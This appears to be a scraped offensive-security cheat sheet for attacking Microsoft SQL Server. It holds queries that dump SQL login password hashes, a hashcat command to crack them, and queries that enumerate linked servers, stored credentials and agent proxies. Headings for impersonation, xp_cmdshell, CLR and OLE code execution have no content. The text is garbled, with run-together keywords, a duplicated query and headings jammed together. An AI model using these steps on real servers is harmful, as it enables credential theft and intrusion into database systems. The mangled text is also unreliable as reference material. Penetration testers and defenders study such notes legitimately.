MS SQL
SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output FROMmaster.sys.sql_logins; Linked Servers
-- query for linked servers
SELECT name, data_source, provider_string, catalogFROM sys.serversWHERE is_linked = 1;
-- Execute via open Query
SELECT * FROM OPENQUERY([LinkedServerName], 'SELECT * FROM DatabaseName.SchemaName.TableName');
-- Direct query execute
SELECT * FROM [LinkedServerName].[DatabaseName].[SchemaName].[TableName];SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output
FROM master.sys.sql_logins;hashcat -m 1731 password_hash.txt pass --username -OProxies
-- check for credentials:
select * from msdb.sys.credentials;
-- check for setup proxies:
select * from msdb.dbo.sysproxies;Linked Servers:
Impersonation
Code Execution:
Agents:
Proxies:
Common Language Runtime:
Create DLL in visual studio:
Upload and execute code:
Object Linking and Embedding (OLE):
XP_cmdshell:
Last updated